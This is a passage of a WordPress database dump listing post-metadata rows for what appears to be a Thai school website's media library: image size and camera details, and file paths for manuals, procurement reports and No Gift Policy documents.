0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21768;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:2:\"16\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:11:\"NIKON D5600\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1723111548\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"29\";s:3:\"iso\";s:3:\"800\";s:13:\"shutter_speed\";s:4:\"0.05\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}s:14:\"original_image\";s:14:\"DSC_1772_0.jpg\";}'),
(2315,805,'_wp_attached_file','2024/08/DSC_1890_0-scaled.jpg'),
(2316,806,'_wp_attached_file','2024/08/DSC_1840_0-scaled.jpg'),
(2317,805,'_wp_attachment_metadata','a:7:{s:5:\"width\";i:2560;s:6:\"height\";i:1707;s:4:\"file\";s:29:\"2024/08/DSC_1890_0-scaled.jpg\";s:8:\"filesize\";i:412071;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:22:\"DSC_1890_0-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17046;}s:5:\"large\";a:5:{s:4:\"file\";s:23:\"DSC_1890_0-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:102641;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:22:\"DSC_1890_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7713;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:22:\"DSC_1890_0-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:66525;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:24:\"DSC_1890_0-1536x1024.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:186392;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:24:\"DSC_1890_0-2048x1365.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:1365;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:290043;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:22:\"DSC_1890_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17548;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"5.6\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:11:\"NIKON D5600\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1723113805\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"55\";s:3:\"iso\";s:3:\"800\";s:13:\"shutter_speed\";s:4:\"0.01\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}s:14:\"original_image\";s:14:\"DSC_1890_0.jpg\";}'),
(2318,806,'_wp_attachment_metadata','a:7:{s:5:\"width\";i:2560;s:6:\"height\";i:1707;s:4:\"file\";s:29:\"2024/08/DSC_1840_0-scaled.jpg\";s:8:\"filesize\";i:479180;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:22:\"DSC_1840_0-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17652;}s:5:\"large\";a:5:{s:4:\"file\";s:23:\"DSC_1840_0-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:114160;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:22:\"DSC_1840_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7824;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:22:\"DSC_1840_0-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:73232;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:24:\"DSC_1840_0-1536x1024.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:213451;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:24:\"DSC_1840_0-2048x1365.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:1365;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:335999;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:22:\"DSC_1840_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18951;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"5.6\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:11:\"NIKON D5600\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1723113242\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"55\";s:3:\"iso\";s:3:\"800\";s:13:\"shutter_speed\";s:4:\"0.01\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}s:14:\"original_image\";s:14:\"DSC_1840_0.jpg\";}'),
(2320,792,'_thumbnail_id','794'),
(2321,792,'_edit_last','1'),
(2323,792,'title_style','default'),
(2324,792,'_title_style','field_5d1a0217cf408'),
(2325,792,'related',''),
(2326,792,'_related','field_603b51c3e183e'),
(2327,807,'title_style','default'),
(2328,807,'_title_style','field_5d1a0217cf408'),
(2329,807,'related',''),
(2330,807,'_related','field_603b51c3e183e'),
(2331,808,'_wp_attached_file','2024/08/คู่มือ.png'),
(2332,808,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:150;s:6:\"height\";i:150;s:4:\"file\";s:30:\"2024/08/คู่มือ.png\";s:8:\"filesize\";i:9329;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2333,809,'title_style','default'),
(2334,809,'_title_style','field_5d1a0217cf408'),
(2335,810,'_edit_lock','1723215928:1'),
(2336,811,'_wp_attached_file','2024/08/คู่มือการขอย้ายออกนักเรียน.pdf'),
(2337,811,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:153139;}'),
(2338,810,'_edit_last','1'),
(2339,810,'title_style','default'),
(2340,810,'_title_style','field_5d1a0217cf408'),
(2341,812,'title_style','default'),
(2342,812,'_title_style','field_5d1a0217cf408'),
(2343,813,'title_style','default'),
(2344,813,'_title_style','field_5d1a0217cf408'),
(2345,815,'_wp_attached_file','2024/08/คู่มือการปฏิบัติงาน.pdf'),
(2346,815,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:6766193;}'),
(2348,817,'_wp_attached_file','2024/08/คู่มือปฏิบัติงานบุคลกรทางการศึกษา-1.pdf'),
(2349,817,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:502504;}'),
(2350,818,'title_style','default'),
(2351,818,'_title_style','field_5d1a0217cf408'),
(2353,820,'_wp_attached_file','2024/08/คู่มือปฏิบัติงานบุคลกรทางการศึกษา-2.pdf'),
(2354,820,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:502504;}'),
(2355,821,'title_style','default'),
(2356,821,'_title_style','field_5d1a0217cf408'),
(2357,823,'title_style','default'),
(2358,823,'_title_style','field_5d1a0217cf408'),
(2359,824,'_edit_lock','1751594411:1'),
(2360,825,'_wp_attached_file','2024/08/08-แผนปฏิบัติการประจำปีงบประมาณ-2567.pdf'),
(2361,825,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:8815253;}'),
(2362,824,'_edit_last','1'),
(2363,824,'title_style','default'),
(2364,824,'_title_style','field_5d1a0217cf408'),
(2365,826,'title_style','default'),
(2366,826,'_title_style','field_5d1a0217cf408'),
(2367,827,'title_style','default'),
(2368,827,'_title_style','field_5d1a0217cf408'),
(2369,828,'_edit_lock','1751955262:1'),
(2370,829,'_wp_attached_file','2024/08/O27-การประชุมเพื่อเสริมสร้างความรู้-ความเข้าใจ.pdf'),
(2371,829,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:694419;}'),
(2372,828,'_edit_last','1'),
(2373,828,'title_style','default'),
(2374,828,'_title_style','field_5d1a0217cf408'),
(2375,830,'title_style','default'),
(2376,830,'_title_style','field_5d1a0217cf408'),
(2377,831,'_edit_lock','1723697891:1'),
(2378,832,'title_style','default'),
(2379,832,'_title_style','field_5d1a0217cf408'),
(2380,833,'_wp_attached_file','2024/08/O28-แบบสรุปรายงานตามนโยบาย-No-Gift-Policy-จากการปฏิบัติหน้าที่.pdf'),
(2381,833,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:315718;}'),
(2382,831,'_edit_last','1'),
(2383,831,'title_style','default'),
(2384,831,'_title_style','field_5d1a0217cf408'),
(2385,834,'title_style','default'),
(2386,834,'_title_style','field_5d1a0217cf408'),
(2387,835,'title_style','default'),
(2388,835,'_title_style','field_5d1a0217cf408'),
(2389,836,'_edit_lock','1723698111:1'),
(2390,837,'_wp_attached_file','2024/08/O29-รายงานการรับทรัพย์สิน-หรือประโยชน์อื่นใด.pdf'),
(2391,837,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:92521;}'),
(2392,836,'_edit_last','1'),
(2393,836,'title_style','default'),
(2394,836,'_title_style','field_5d1a0217cf408'),
(2395,838,'title_style','default'),
(2396,838,'_title_style','field_5d1a0217cf408'),
(2397,839,'title_style','default'),
(2398,839,'_title_style','field_5d1a0217cf408'),
(2399,840,'_edit_lock','1723696955:1'),
(2401,842,'_wp_attached_file','2024/08/o14รายงานการจัดซื้อจัดจ้างหรือจัดหาพัสดุ.xlsx'),
(2402,842,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:10824;}'),
(2403,843,'_wp_attached_file','2024/08/o14รายงานการจัดซื้อจัดจ้างหรือจัดหาพัสดุ-1.xlsx'),
(2404,843,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:10914;}'),
(2405,840,'_edit_last','1'),
(2406,840,'title_style','default'),
(2407,840,'_title_style','field_5d1a0217cf408'),
(2408,844,'title_style','default'),
(2409,844,'_title_style','field_5d1a0217cf408'),
(2410,845,'title_style','default'),
(2411,845,'_title_style','field_5d1a0217cf408'),
(2413,847,'title_style','default'),
(2414,847,'_title_style','field_5d1a0217cf408'),
(2415,848,'title_style','default'),
(2416,848,'_title_style','field_5d1a0217cf408'),
(2417,849,'title_style','default'),
(2418,849,'_title_style','field_5d1a0217cf408'),
(2419,850,'title_style','default'),
(2420,850,'_title_style','field_5d1a0217cf408'),
(2421,851,'_edit_lock','1723697132:1'),
(2422,852,'_wp_attached_file','2024/08/o16ความก้าวหน้าการจัดซื้อจัดจ้างหรือจัดหาพัสดุ.xlsx'),
(2423,852,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:26189;}'),
(2424,851,'_edit_last','1'),
(2425,851,'title_style','default'),
(2426,851,'_title_style','field_5d1a0217cf408'),
(2427,853,'title_style','default'),
(2428,853,'_title_style','field_5d1a0217cf408'),
(2429,854,'title_style','default'),
(2430,854,'_title_style','field_5d1a0217cf408'),
(2431,855,'_edit_lock','1723697529:1'),
(2432,856,'_wp_attached_file','2024/08/o17รายงานสรุปผลการจัดซื้อจัดจ้างหรือจัดหาพัสดุ.xlsx'),
(2433,856,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:84219;}'),
(2434,855,'_edit_last','1'),
(2435,855,'title_style','default'),
(2436,855,'_title_style','field_5d1a0217cf408'),
(2437,857,'title_style','default'),
(2438,857,'_title_style','field_5d1a0217cf408'),
(2439,858,'title_style','default'),
(2440,858,'_title_style','field_5d1a0217cf408'),
(2441,859,'_edit_lock','1749451230:1'),
(2442,860,'_wp_attached_file','2024/08/O26-ประกาศเจตนารมณ์.pdf'),
(2443,860,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:143919;}'),
(2444,861,'_wp_attached_file','2024/08/ประกาศเจตนารมณ์.pdf'),
(2445,861,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:143919;}'),
(2446,859,'_edit_last','1'),
(2447,859,'title_style','hidden'),
(2448,859,'_title_style','field_5d1a0217cf408'),
(2449,862,'title_style','default'),
(2450,862,'_title_style','field_5d1a0217cf408'),
(2451,863,'title_style','default'),
(2452,863,'_title_style','field_5d1a0217cf408'),
(2453,864,'_wp_attached_file','2024/08/การสร้างวัฒนธรรม-No-Gift-Policy.pdf'),
(2454,864,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:694419;}'),
(2455,865,'title_style','default'),
(2456,865,'_title_style','field_5d1a0217cf408'),
(2457,866,'_wp_attached_file','2024/08/แบบสรุปรายงานตามนโยบาย-No-Gift-Policy-จากการปฏิบัติหน้าที่.pdf'),
(2458,866,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:315718;}'),
(2459,867,'title_style','default'),
(2460,867,'_title_style','field_5d1a0217cf408'),
(2461,868,'_wp_attached_file','2024/08/รายงานการรับทรัพย์สิน-หรือประโยชน์อื่นใด.pdf'),
(2462,868,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:92521;}'),
(2463,869,'title_style','default'),
(2464,869,'_title_style','field_5d1a0217cf408'),
(2466,871,'_edit_lock','1751949753:1'),
(2467,871,'_generateblocks_dynamic_css_version','2.1.0'),
(2468,871,'_edit_last','1'),
(2469,871,'title_style','hidden'),
(2470,871,'_title_style','field_5d1a0217cf408'),
(2471,872,'title_style','default'),
(2472,872,'_title_style','field_5d1a0217cf408'),
(2474,874,'title_style','default'),
(2475,874,'_title_style','field_5d1a0217cf408'),
(2477,876,'title_style','default'),
(2478,876,'_title_style','field_5d1a0217cf408'),
(2480,879,'title_style','default'),
(2481,879,'_title_style','field_5d1a0217cf408'),
(2483,881,'title_style','default'),
(2484,881,'_title_style','field_5d1a0217cf408'),
(2486,883,'title_style','default'),
(2487,883,'_title_style','field_5d1a0217cf408'),
(2489,885,'title_style','default'),
(2490,885,'_title_style','field_5d1a0217cf408'),
(2492,887,'title_style','default'),
(2493,887,'_title_style','field_5d1a0217cf408'),
(2494,16,'_wp_old_date','2024-08-07'),
(2496,17,'_wp_old_date','2024-08-07'),
(2498,553,'_wp_old_date','2024-08-07'),
(2500,554,'_wp_old_date','2024-08-07'),
(2502,18,'_wp_old_date','2024-08-07'),
(2504,19,'_wp_old_date','2024-08-07'),
(2506,20,'_wp_old_date','2024-08-07'),
(2509,889,'title_style','default'),
(2510,889,'_title_style','field_5d1a0217cf408'),
(2511,890,'_wp_attached_file','2024/08/Is-It-a-Gift-Instagram-Post-1.png'),
(2512,890,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:800;s:6:\"height\";i:300;s:4:\"file\";s:41:\"2024/08/Is-It-a-Gift-Instagram-Post-1.png\";s:8:\"filesize\";i:87907;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:41:\"Is-It-a-Gift-Instagram-Post-1-300x113.png\";s:5:\"width\";i:300;s:6:\"height\";i:113;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:20944;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:41:\"Is-It-a-Gift-Instagram-Post-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:16607;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:41:\"Is-It-a-Gift-Instagram-Post-1-768x288.png\";s:5:\"width\";i:768;s:6:\"height\";i:288;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:103106;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:41:\"Is-It-a-Gift-Instagram-Post-1-360x189.png\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:45718;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2514,892,'_wp_attached_file','2024/08/Is-It-a-Gift-Instagram-Post-2.png'),
(2515,892,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1200;s:6:\"height\";i:300;s:4:\"file\";s:41:\"2024/08/Is-It-a-Gift-Instagram-Post-2.png\";s:8:\"filesize\";i:63701;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:40:\"Is-It-a-Gift-Instagram-Post-2-300x75.png\";s:5:\"width\";i:300;s:6:\"height\";i:75;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:10030;}s:5:\"large\";a:5:{s:4:\"file\";s:42:\"Is-It-a-Gift-Instagram-Post-2-1024x256.png\";s:5:\"width\";i:1024;s:6:\"height\";i:256;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:87591;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:41:\"Is-It-a-Gift-Instagram-Post-2-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:13809;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:41:\"Is-It-a-Gift-Instagram-Post-2-768x192.png\";s:5:\"width\";i:768;s:6:\"height\";i:192;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:52699;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:41:\"Is-It-a-Gift-Instagram-Post-2-360x189.png\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:37096;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2516,871,'_thumbnail_id','890'),
(2517,893,'title_style','default'),
(2518,893,'_title_style','field_5d1a0217cf408'),
(2519,894,'title_style','default'),
(2520,894,'_title_style','field_5d1a0217cf408'),
(2522,896,'title_style','default'),
(2523,896,'_title_style','field_5d1a0217cf408'),
(2525,898,'title_style','default'),
(2526,898,'_title_style','field_5d1a0217cf408'),
(2528,900,'_edit_lock','1724128920:1'),
(2529,901,'_wp_attached_file','2024/08/การขับเคลื่อนจริยธรรม-.pdf'),
(2530,901,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:1472200;}'),
(2531,900,'_edit_last','1'),
(2532,900,'title_style','default'),
(2533,900,'_title_style','field_5d1a0217cf408'),
(2534,902,'title_style','default'),
(2535,902,'_title_style','field_5d1a0217cf408'),
(2536,903,'title_style','default'),
(2537,903,'_title_style','field_5d1a0217cf408'),
(2538,904,'title_style','default'),
(2539,904,'_title_style','field_5d1a0217cf408'),
(2540,905,'_edit_lock','1724130260:1'),
(2541,906,'_wp_attached_file','2024/08/S__69214221_0.jpg'),
(2542,906,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:25:\"2024/08/S__69214221_0.jpg\";s:8:\"filesize\";i:624127;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:25:\"S__69214221_0-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17630;}s:5:\"large\";a:5:{s:4:\"file\";s:26:\"S__69214221_0-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:163288;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"S__69214221_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8602;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:25:\"S__69214221_0-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:97631;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:26:\"S__69214221_0-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:318680;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:25:\"S__69214221_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22982;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(2543,907,'_wp_attached_file','2024/08/S__69214223_0.jpg'),
(2544,907,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:25:\"2024/08/S__69214223_0.jpg\";s:8:\"filesize\";i:587816;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:25:\"S__69214223_0-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17117;}s:5:\"large\";a:5:{s:4:\"file\";s:26:\"S__69214223_0-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:153662;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"S__69214223_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8558;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:25:\"S__69214223_0-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:92234;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:26:\"S__69214223_0-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:299632;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:25:\"S__69214223_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22195;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(2545,908,'_wp_attached_file','2024/08/S__69214213_0.jpg'),
(2546,908,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:25:\"2024/08/S__69214213_0.jpg\";s:8:\"filesize\";i:518630;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:25:\"S__69214213_0-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16611;}s:5:\"large\";a:5:{s:4:\"file\";s:26:\"S__69214213_0-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:138399;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"S__69214213_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8074;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:25:\"S__69214213_0-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:84288;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:26:\"S__69214213_0-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:265183;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:25:\"S__69214213_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21436;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(2547,909,'_wp_attached_file','2024/08/S__69214215_0.jpg'),
(2548,909,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:25:\"2024/08/S__69214215_0.jpg\";s:8:\"filesize\";i:525335;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:25:\"S__69214215_0-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16587;}s:5:\"large\";a:5:{s:4:\"file\";s:26:\"S__69214215_0-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:140884;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"S__69214215_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8037;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:25:\"S__69214215_0-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:85740;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:26:\"S__69214215_0-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:270993;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:25:\"S__69214215_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21577;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(2549,910,'_wp_attached_file','2024/08/S__69214216_0.jpg'),
